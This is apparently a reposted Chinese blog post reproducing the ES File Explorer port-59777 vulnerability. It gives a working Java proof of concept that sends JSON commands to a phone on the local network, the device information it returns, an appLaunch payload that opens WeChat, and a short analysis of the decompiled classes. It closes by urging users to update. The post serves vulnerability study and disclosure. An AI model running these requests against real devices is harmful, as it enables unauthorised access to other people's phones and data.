趣文网 > 作文大全

利用java复现 ES文件浏览器 CVE

2020-12-02 04:00:01
相关推荐

今天看到关于ES文件浏览器的漏洞,觉得危险程度非常高,所以我简单的用java代码复现一下,

首先关于ES文件浏览器,我就不多说了。非常著名的一款文件浏览器。

漏洞利用就是该软件运行之后开启TCP 59777端口,

该端口未关闭导致可以通过HTTP协议POST请求接收JSON数据,进行解析执行返回结果。

环境:

win10,IDEA,JDK 1.8.0_181,一加5,Android P,ES文件浏览器4.1.9.7.4之前(我用的4.1.8.3.1)

复现:

public class Test {

public static void main(String[] args) {

String data = "{"command":"getDeviceInfo"}";

String path = "http://192.168.43.36:59777";

URL url = null;

try{

url = new URL(path);

HttpURLConnection conn = (HttpURLConnection) url.openConnection();

conn.setRequestMethod("POST");

conn.setConnectTimeout(5000);

conn.setRequestProperty("User-Agent","curl/7.54.0");

conn.setRequestProperty("Accept","*/*");

conn.setRequestProperty("Content-Type","application/json");

conn.setRequestProperty("Content-Length",data.length()+"");

conn.setRequestProperty("Connection","close");

conn.setDoOutput(true);

conn.getOutputStream().write(data.getBytes());

//获取响应码

int code = conn.getResponseCode();

System.out.println("run2:"+code);

//如果请求码为200

if(code == 200){

InputStream in = conn.getInputStream();

String msg = tools.transStream(in);

System.out.println(msg);

}

}catch (Exception e){

e.printStackTrace();

}

}

}

返回结果:

{"name":"ONEPLUS A5000", "ftpRoot":"/sdcard", "ftpPort":"3721"}

可以看到,我们通过POST请求提交了

`{"command":"getDeviceInfo"}` 指令,

就返回了我们手机的设备信息,

更甚至我们可以通过指令来打开我们设备上安装的应用程序:

POST提交:

{"command":"appLaunch", "appPackageName": "com.tencent.mm"}

提交该json数据,则可以直接打开我们手机上安装的微信。

打开微信

漏洞简要分析:

本次漏洞主要在:

com.estrongs.fs.impl.adb.c

com.estrongs.android.f.a

解压ES文件浏览器,得到4个dex文件

dex文件

挨个使用jadx打开搜索command关键字,找到漏洞关键位置

在classes2.dex中定位到com.estrongs.android.f.a

可以看到在a方法内

通过command获取到对应的指令,然后执行相应的方法,

这里我就简单看一下获取设备信息的这条执指令:

在这里,如果`str3.equals("getDeviceInfo")`成立,

则执行b这个方法,并将jSONObject传进去,我们下拉定位到b这个方法

可以看到这个方法是通过StringBuilder,进行拼接设备信息,

和ftpPort信息,然后进行返回。

在看一下启动应用程序这条指令:

可以看到如果传来指令为appLaunch,

则执行a这个方法,并将jSONObject传递过去,下拉定位到a这个方法,

可以看到,他通过获取appPackageName对应的String,

然后进行非空判断,通过Intent将appPackageName对应的包名传入,

然后通过startActivity启动该应用程序。

通过以上分析,我们可以看出,ES可以执行的指令还是很多的,有些危害还是比较严重的,

所以目前使用ES文件浏览器的,请尽快升级到最新版本。

可以看到最新版是已经修复了该漏洞了。

更多详细内容,可以参考我的博客:

blog.bobo1998.com

阅读剩余内容
网友评论
相关内容
小编推荐

大家都在看

关于秋天的作文叙事 家庭风暴作文 最珍贵的礼物作文800字 作文那只手 四年级上册语文第三单元作文 令我陶醉作文 我学会了下棋作文 女人作文 黄瓜作文300字 父亲节英语作文80词 以后的生活作文 黄瓜炒鸡蛋作文 作文写作网课 观察落叶作文 与书相遇作文 龟兔赛跑的作文 英语作文20词左右 如何管理好班级作文 插叙作文800字 感动的事作文350字 妈妈真能干作文 珍惜时间400字作文 以蜕变为话题的作文 学会留心作文 假如我是天使作文 圣诞礼物作文 习爷爷我想对您说作文 相伴话题作文 绿水青山的作文 遇见春天作文600字